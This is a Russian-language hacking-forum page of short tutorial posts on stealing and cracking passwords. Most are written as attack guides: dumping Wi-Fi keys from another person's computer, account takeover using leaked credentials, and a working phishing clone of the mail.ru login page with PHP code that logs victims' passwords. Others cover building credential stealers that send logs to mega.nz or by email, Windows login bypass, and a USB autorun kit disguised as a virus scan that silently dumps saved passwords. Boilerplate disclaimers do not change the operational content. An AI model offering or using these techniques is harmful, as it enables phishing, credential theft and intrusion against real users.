Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'взлом пароля'.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете узнать пароль от Wi-Fi роутера без какого-либо взлома. Давайте на минуточку представим, что вам в руки попал чей-то компьютер, на котором вам нужно узнать пароль от сети Wi-Fi, к которому он подключен. Сегодня мы покажем вам, как это сделать ! Погнали! 1. Вызываем командную строку введя "cmd" в поиске. 2. Нажимаем на "Запуск от имени администратора". 3. Затем в командной строке пишем "netsh wlan show profiles". После чего вы узнаете название сети. 4. Далее вводим "netsh wlan show profile name="название сети" key=clear". Сам пароль от Wi-Fi будет показан в поле "Key Content". Далее вам остается сделать скриншот или сохранить в избранное, чтобы не проделывать данные действия повторно. Вот таким вот интересным способом вы можете заполучить практически любой пароль от Wi-Fi, если для этого будет созданы определенные условия. Не нужно париться с программами, со взломами, все делается быстро и без каких-либо следов и лишних телодвижений. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как хакеры могут взламывать разные пароли не используя ничего, кроме готовых баз данных. Различные устройства по дефолту имеют стандартный логин / пароль, пароль обычно напечатан на наклейке корпуса или указан в инструкции. Нежелание людей менять пароли "по умолчанию" часто создает угрозу безопасности не только для роутеров, но и для видеонаблюдения, умных колонок, холодильников, принтеров, пожарной безопасности или даже систем промышленного контроля. Подборка ресурсов с базой стандартных паролей 1. defpass.com 2. many-passwords.github.io 3. fortypoundhead.com 4. cirt.net 5. datarecovery.com 6. passwordsdatabase.com 7. default-password.info 8. www.routerpasswords.com Используя эти сайты, хакеры способны практически мгновенно взломать любой стандартный пароль, который установит неопытный пользователь. Поэтому рекомендую ознакомится с данными ресурсами, чтобы знать где их можно использовать, а самое главное защитить свои данные от взлома. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно защититься от кейлогеров. Если вы случайно скачаете вирус, вместе с ним к вашему компьютеру могут привязаться кейлоггеры. Это такие хитрые программы, которые запоминают нажатия клавиш на клавиатуре. Например, когда вы вводите свой логин и пароль для входа во ВКонтакте или Сбербанк Онлайн и тд. Так кейлоггер незаметно записывает эти данные и получает доступ к вашим банковским счетам и соцсетям Работает это не очень сложно: кейлоггер просто выдаёт себя за устройство, которое принимает все нажатия клавиш. Такие кибератаки очень опасны, ведь у вас могут украсть ваши данные. Ghostpress - Этот сервис поможет обнаружить и избавиться от этих вредителей. Он работает в фоновом режиме и автоматически блокирует все кейлоггеры. Его база настолько обширна, что Ghostpress практически гарантирует защиту от них. Программа имеет как бесплатный, так и платный функционал. Для каждого станет незаменимым инструментом для защиты своего компьютера от кейлогеров различного вида. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о легком способе взлома пароля администратора на Linux. Получить пароль суперпользователя Linux можно и в загрузчике, однако если к нему доступа нет, то в бой могут пойти отдельные утилиты. Именно о такой утилите и пойдет сейчас речь. Одной из таких является MimiPenguin. Изначально она специализировалась только на Kali Linux, но теперь в список поддерживаемых ОС добавились Ubuntu, Archlinux, OpenSUSE и другие. В будущем список поддерживаемых операционных систем будет расширяться. Установка и использование: git clone https://github.com/huntergregal/mimipenguin cd mimipenguin ./mimipenguin.sh После чего в терминале появится список пользователей, с паролем к каждому. Помимо версии на bash, существует также реализация MimiPenguin на Python. Находится она в том же самом репозитории. Очень простой метод как в понимании, так и в реализации, если необходимо взломать слабозащищенную систему. Именно для таких случаев рекомендую использовать этот способ. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Когда взломщики подбирают пароль от вашего аккаунта — они используют специальный софт по подбору. Насколько быстро у них получится сделать это, зависит от сложности пароля. Если он длинный и непопулярный — это займёт вечность.) Но если нет (что чаще всего и происходит), есть риск потерять доступ к своим аккаунтам. Поэтому существует очень классный сервис — Kaspersky Password Checker. Он покажет, сколько минут, часов или лет понадобится, чтобы можно было взломать ваш пароль. Лучше не вводить свой настоящий пароль, а заменить в нём пару символов. Хотя это надёжно и сервис не хранит пароли, лучше перестраховаться. На результат проверки это всё равно абсолютно никак не повлияет. Ещё есть полезная фича: проверка показывает, сколько раз ваш пароль встречался в базе утечек. Также рядом будет подборка из интересных фактов о паролях. Например, если для подбора потребуется 9784 века, за это время «Бендер Родригез («Футурама») успеет спереть всё сущее в этой галактике, включая ваш пароль». Kaspersky Password Checker Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В этой статье хочу рассказать, как можно узнать пароли от всех Wi-Fi сетей к которым вы когда-либо подключались. Windows хранит данные про все сети, к которым подключалось устройство, в том числе и пароли от них. При желании вы можете получить к ним доступ с помощью командной строки. Для этого вам необходимо выполнить следующие пункты: 1. Откройте командную строку от имени администратора. 2. Введите команду «netsh wlan show profiles», чтобы посмотреть список всех Wi-Fi сетей, к которым вы подключались ранее с этого устройства. 3. Выберите имя нужной сети и введите команду «netsh wlan show profile name=Имя_сети key=clear». Вместо «Имя_сети» введите название Wi-Fi сети, пароль от которого необходимо узнать. Если оно состоит из нескольких слов, необходимо взять его в кавычки. После этого в командную строку будет выведена вся известная компьютеру информация о Wi-Fi сети, а пароль от неё будет показан возле пункта «Содержимое ключа». Теперь вы можете использовать его для подключения, если ранее этот пароль никто не изменял. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Таблицы, записи, презентации, все они имеют огромную информационную ценность. Стремясь защитить свои данные, многие нередко ставят на эти типы файлов пароли, еще чаще того требуют работодатели. Но как быть, если пароль забыт или же документ запаролен не вами, а доступ получить нужно? К счастью или к сожалению, а внутренняя зашита (пароль) таких программ, как Microsoft Word и т.д., очень уязвима. Уязвима настолько, что ''снести" пароль может даже обычный онлайн ресурс. Одним из многих ресурсов является Online Password Recovery. Он способен снимать пароли с Microsoft Word, Excel и PowerPoint. Конечно, успех расшифровки пароля зависит от версии и сложности пароля. Например, если вам нужно снять пароль с документа Microsoft Office 2016 года, шанс того, что сервис поможет вам, равен 78% (статистика сервиса). Мой несложный пароль 5623 сервис отгадал за пару секунд. Из минусов, вы увидите лишь часть документа. Чтобы посмотреть весь документ, придется покупать лицензию. Просто загрузите нужный вам файл, подождите несколько минут и, скорее всего, пароль будет сброшен. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Как взломать пароль WinRAR?
roguevad posted a topic in A section for resolving controversial issues.
Приветствую, хакеры! Я абсолютно уверен, что каждый из нас как минимум один раз в жизни встречался с запароленными архивами. Сетевой сталкеринг очень распространен в наши дни. Много кто прибегает к такому виду деятельности либо чисто по фану, либо исходя из конкретных целей. Конечно, ведь по данным IDC интернет "забит" экзабайтами информации (примерно 500 млрд. ГБ), и среди такой кучи данных можно отыскать много всего интересного. Сразу уточню, что взломать пароль можно только от архива, который запакован в 3, край 4 версии RARа. Взломать пароль пятой версии на данный момент не возможно, тк разработчики добавили туда шифрования AES-256. Инструкция: 1. Скачиваем программу Advanced Archive Password Recoverу (пробная версия) 2. Устанавливаем ее > Открываем > переходим на вкладочку «Options» и устанавливаем русский язык. 3. Переходим на вкладку Длина и устанавливаем количество символов. (по опыту скажу, лучше пробовать с 4 символов) 4. Далее выбираем тип атаки > выбираем набор символов. 5. Открываем в программе архив, к которому нужно подобрать пароль и ждем. Готово! Пароль от архива взломан. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации -
Приветствую, хакеры, в данной статье я хочу познакомить вас с одной утилитой Termux, которая называется - h8mail. Чем же она хороша? Она прогонят нужную вам почту по своим базам и выдает некоторое кол-во паролей, с ее помощью можно получить доступ не только к почтовому ящику, а вообще ко всем аккаунтам, если пользователь использует при этом одни и те же пароли. Допустим, пользователь зарегистрировался на сайте www.adobe,com. Через время в сеть утекла ее БД, а значит пароль пользователя в открытом доступе. H8mail собирает все слитые базы и дает вам к ним своеобразный доступ. Инструкция: Устанавливаем Termux и прописываем команды в консоль: update -y & pkg upgrade -y pkg install git python pip install requests pip install h8mail Теперь вписываем нужный нам email: h8mail -t почта За минуту утилита прогонит почту по своим базам и если она где-то засветилась в слитых базах данных, то вы получите положительный результат. Вы получите правильный пароль от почты и сможете в нее войти, а возможно сможете получить доступ к различным аккаунтам на базе этой почты. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
В повседневной жизни мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе, ресторане или в общественном месте всегда можно найти точку доступа. Нередко попадаются роутеры с «гостевым доступом». Но бывает, что бесплатный Wi-Fi защищен Captive Portal. Иными словами, имеется открытая сеть Wi-Fi, к которой можно подключиться без пароля, но при попытке зайти на любой сайт, нас будет перебрасывать на страницу, где нужно ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-то похожее. Конечно, желания оплачивать такую услугу совершенно нет, поэтому мы воспользуемся утилитой, которая будет обходить данную защиту. Заходим в терминал и прописываем команды для установки: обновляем пакеты: apt update apt upgrade качаем пакеты: apt -y install sipcalc nmap wget Теперь инструмент: wget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.sh Делаем файл исполняемым и запускаем: chmod u+x hack-captive.sh ./hack-captive.sh После фразы "Pwned! Now you can surf the Internet!", вы можете спокойно пользоваться интернетом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Начнем с создания клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы, такие как картинки, аудио файлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого нам нужно изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там. Для примера попробуем создать реплику сайта страницы авторизации Mail. Её адрес https://account.mail.ru/login, чтобы нам просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в Linux есть более простое решение. В консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидим, то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальном сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами: source /etc/apache2/envvars systemctl restart apache2 После того как приветственная страница отображается, нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php". Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда: <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> Пояснение file_put_contents - функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим: mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправляем её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда: header('Location: https://account.mail.ru/login?fail=1'); В общем ничего сложного и все уже готово. Пробуем зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.txt Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет хакеры! Сегодня будем собирать свой стиллер из исходников Echelon Stealer v6. Функционал Браузеры: все браузеры на основе Chromium, все браузеры на основе Gecko (Mozilla) включая x32 и x64 версии, старые версии Edge и ie, рекурсивный сбор всех данных: пароли, история, авто-заполнение, cookies, cards, стилер криптокошельков - сессий и .dat файлов. Стиллер сессий: Discord, Telegram, Steam, FileZilla, Total Commander, Psi+, Pidgin и др. Граббер файлов: можно ограничить вес каждого файла, можно указать свои расширения для граббинга, по умолчанию собирает файлы с расширениями ".txt", ".doc", ".cs", ".json", ".suo", ".sql", рабочий стол и все подпапки, названия папок и их вложенность сохраняется как есть. Отправка лога осуществляется на: https://mega.nz Установка и настройка Устанавливаем Visual Studio, если еще не установлена. Качаем проект и открываем Echelon.sln, переходим к Program.cs. Настраиваем по скрину, не забывая ввести данные от mega.nz. Запускаем сборку обязательно на конфигурации Release! Для первого запуска проект нужно собрать как "Консольное приложение", чтобы убедиться в работоспособности. Если все нормально - собираем как "Приложение Windows". Собранный файл, уже скомпилированный, будет лежать в папке OUTPUT в корне проекта. Скачать Echelon Stealer v6. Внимание! Файл не проверен на вирусы! Осторожно! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Всем привет, сегодня я вам расскажу, как собрать небольшой стиллер, выполнив всего лишь несколько простых пунктов. Наша программка будет отправлять всю вводимую информацию жертвы на вашу почту. Поэтому вооружаемся почтой и способом распространения стиллера и вперед! Начнем с того, что нам понадобится для его создания. Вот полный список: • LaZagne – программа, позволяющая восстанавливать пароли и позже записывать их в текстовый файл • Файл формата .bat который будет использовать для запуска вышеуказанной программы и указания директории хранения результатов • Скрипт VBS который понадобится для отправки письма на электронную почту • Конвертер VBS в EXE, однако, если хотите, то можете его и не использовать • Конвертер BAT в EXE 1.Нам необходимо создать файл формата .bat и записать туда эти строки: @Echo off laZagne.exe all > C:\install_error.bin TIMEOUT /T 2 sender.exe TIMEOUT /T 5 del /s "%UserProfile%\Downloads\laZagne.exe" del /s "%UserProfile%\Downloads\SENDER.exe" del /s "%UserProfile%\Desktop\laZagne.exe" del /s "%UserProfile%\Desktop\SENDER.exe" Строка “С:\install_error.bin” означает, что здесь будут храниться результаты, таймаут нужен для добавления ожидания при сохранении результата, обычно это около ста паролей в секунду. 2.Далее мы делаем обычный текстовый документ, там, где вам будет это удобно. После создания его нужно сохранить в виде .vbs файла. Туда нам нужно будет написать этот не самый большой код: Dim o_Mess, v_Conf v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/" Set o_Mess = CreateObject ("CDO.Message") With o_Mess .To = "получатель@mail.com" 'место отправления .From = "Имя " 'Логин отправителя и его почта .Subject = "Log" название темы .TextBody = "BodyMail" письмо .AddAttachment "D:\install_error.bin" Прикрепление файла .TextBodyPart.Charset = "windows-1251" кодировка русских символов With .Configuration.Fields .Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange .Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера .Item(v_Conf & "smtpauthenticate") = 1 Вид входа .Item(v_Conf & "sendusername") = "отправитель@mail.ru" логин человека .Item(v_Conf & "sendpassword") = "пароль отправителя" 'его пароль .Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465) .Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL .Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения .Update End With .send End With Set o_Mess = Nothing 3.Производим компиляцию всего этого месива с помощью конвертера из последнего пункта необходимых вещей. Как только вы это сделаете, просто сохраняете файл запуска и стартуете его. 4. Переходим на свою электронную почту и находим там письмо, которые было отправлено вашей программой. 5. Открываете файл с результатами в выбранной вами директории через любой текстовый редактор и собираете данные!
-
Всем привет, иногда бывает ситуация, что вы забыли пароль от своей ОС. И вы в недоумении будете думать, а что же делать? Как раз-таки это мы сейчас обсудим, я вам расскажу, как вы можете взломать свой собственный пароль на Windows. Ну вы конечно же понимаете, что можете не только и свой. Первым делом нам нужно скачать Kon-Boot, именно с ним мы и будем работать. После чего мы подключаем флешки и форматируем его в системе FAT32, как вы понимаете, вся информация с накопителя будет уничтожена. Далее мы разархивируем файл, в котором находится необходимая нам программа. Дальше мы открываем папку kon-bootUSB и открываем usbinstall2NEEDADMIN.летучая мышь выдав ей права администратора. Теперь, если к вашему компьютеру подключен один накопитель, то в программе нажимаем все галочки, до тех пор, пока не появится строчка USB kon-boot is Ready. Отлично, флешка подготовлена к эксплуатации. Вытаскиваем ее из нашего компьютера. Теперь мы устанавливаем наш накопитель в компьютер, который нам необходимо взломать. После этого мы запускаем БИОС и там выбираем способ загрузки с USB. Стартуем Windows. Сразу предупреждаю, если взламываемая система с Windows 8 или 8.1, то она будет загружена в режиме UEFI, поэтому чтобы наша программа заработала, нам нужно в БИОСе выключить Secure Boot. После того как вы избавились этой проблемы, можете вставить накопитель в компьютер и опять стартуем винду. С помощью данной программы вы сможете зайти в операционную систему не вводя ничего, это достигается путем изменения ядра Windows, при этом пароль никуда не пропадает, при обычном запуске он все также будет требоваться и будет абсолютно таким же как и прежде. Некоторые особенности работы: Вы не сможете воспользоваться данным методом, если для входа в Windows 10 используется учетная запись Майкрософт. Данная программа способно обойти только компьютерную учетную запись.Вы не сможете произвести взлом если в БИОСе включен тот самый Security Boot.Может случиться, что в некоторых портах USB данный метод работать не будет.Так же как я уже говорил, пароль с компьютера не удаляется, он всего лишь обходится.Не всегда срабатывает с первого раза.
-
Привет, хакеры, как мы все знаем, Windows хранит большинство паролей, которые используются на ежедневной основе, включая пароли мгновенных сообщений, такие как MSN, Yahoo, AOL, Windows messenger и т. Д. Наряду с этим Windows также хранит пароли Outlook Express, SMTP, POP , Учетные записи FTP и автозаполнение паролей многих браузеров, таких как IE и Firefox. Существует множество инструментов для восстановления этих перехватчиков из их сохраненных мест. Используя эти инструменты и USB-накопитель, вы можете создать свой собственный руткит, чтобы обманывать пароли с любого компьютера. Нам нужны следующие инструменты для создания руткита: 1) MessenPass : Восстанавливает пароли самых популярных программ Instant Messenger: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x / 2003, AOL Instant Messenger с Netscape 7, Trillian, Miranda и GAIM. 2) Mail PassView : восстанавливает пароли следующих почтовых программ: Outlook Express, Microsoft Outlook 2000 (только для учетных записей POP3 и SMTP), Microsoft Outlook 2002/2003 (учетные записи POP3, IMAP, HTTP и SMTP), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail бесплатно. 3) Mail PassView также может восстановить пароли учетных записей электронной почты в Интернете (HotMail, Yahoo !, Gmail), если вы используете связанные программы этих учетных записей. 4) IE Passview : IE PassView - небольшая утилита, которая показывает пароли, хранящиеся в браузере Internet Explorer. Он поддерживает новый Internet Explorer 7.0, а также более старые версии Internet Explorer, v4.0 - v6.0 5) Защищенное хранилище PassView : восстанавливает все пароли, хранящиеся в защищенном хранилище, включая пароли автозаполнения Internet Explorer, пароли защищенных паролем сайтов, пароли MSN Explorer и т. Д. 6) PasswordFox : PasswordFox - это небольшой инструмент для восстановления пароля, который позволяет вам просматривать имена пользователей и пароли, хранящиеся в браузере Mozilla Firefox. По умолчанию PasswordFox отображает пароли, хранящиеся в вашем текущем профиле, но вы можете легко выбрать для просмотра паролей любого другого профиля Firefox. Для каждой записи пароля отображается следующая информация: Индекс записи, веб-сайт, имя пользователя, пароль, поле имени пользователя и пароль. Подготовка USB-накопителя для взлома пароля: 1) Ниже приведена пошаговая процедура создания инструментария для взлома пароля: 2) Вы должны временно отключить антивирус, прежде чем выполнять следующие шаги. 3) Загрузите все 5 инструментов, извлеките их и скопируйте только исполняемые файлы (файлы .exe) на свой USB-накопитель. Т.е.: скопируйте файлы - mspass.exe , mailpv.exe , iepv.exe , pspv.exe и passwordfox.exe на свой USB-накопитель. Создайте новый блокнот и напишите в него следующий текст: 1) [autorun] open = launch.bat ACTION = выполнить проверку вирусов 2) сохраните Блокнот и переименуйте его из New Text Document.txt в autorun.inf . Теперь скопируйте в autorun.inf файл на USB-накопитель пера. Создайте еще один блокнот и напишите на нем следующий текст: 1) start mspass.exe / stext mspass.txt start mailpv.exe / stext mailpv.txt start iepv.exe / stext iepv.txt start pspv.exe / stext pspv.txt start passwordfox.exe / stext passwordfox.txt 2) Сохраните блокнот и переименуйте его из New Text Document.txt на launch.bat. Скопируйте в launch.bat файл на USB - диск. 3) Теперь ваш руткит готов, и вы все настроены на обнюхивание паролей. Вы можете использовать этот накопитель для пера на любом компьютере, чтобы обнюхать сохраненные пароли. Просто выполните следующие действия: 4) Вставьте ручку-перо и всплывающее окно автоматического запуска. (Это потому, что мы создали автозапуск pen-drive). 5) Во всплывающем окне выберите первый вариант ( выполнить проверку вирусов ). 6) Теперь все инструменты восстановления пароля будут незаметно выполняться в фоновом режиме (этот процесс занимает несколько секунд). Пароли сохраняются в файлах .TXT . 7) Удалите ручку-накопитель, и вы увидите сохраненные пароли в файлах .TXT . 8) Этот взлом работает в Windows 2000, XP, Vista и 7. ПРИМЕЧАНИЕ. Эта процедура восстанавливает только сохраненные пароли (если они есть) на компьютере. Я никого ни к чему не призываю, статья написана в ознакомительных целях!